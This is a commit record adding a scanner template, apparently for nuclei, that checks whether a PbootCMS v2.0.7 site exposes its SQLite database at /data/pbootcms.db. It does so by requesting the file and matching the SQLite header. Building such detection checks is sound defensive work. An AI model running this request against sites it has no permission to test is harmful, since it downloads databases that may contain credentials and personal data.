Merge pull request #4073 from ritikchaddha/patch-16

Create pbootcms-database-file-download.yaml
patch-1
Prince Chaddha 2022-04-07 17:32:58 +05:30 committed by GitHub
commit 84b9e66fba
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: pbootcms-database-file-download
info:
name: PbootCMS v2.0.7 DB File Download
author: ritikchaddha
severity: high
reference:
- https://xz.aliyun.com/t/7628
- https://www.cnblogs.com/0daybug/p/12786036.html
tags: pbootcms,db,exposure,database,sqlite
requests:
- method: GET
path:
- "{{BaseURL}}/data/pbootcms.db"
max-size: 20000
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PbootCMS"
- "SQLite format 3"
condition: and
- type: status
status:
- 200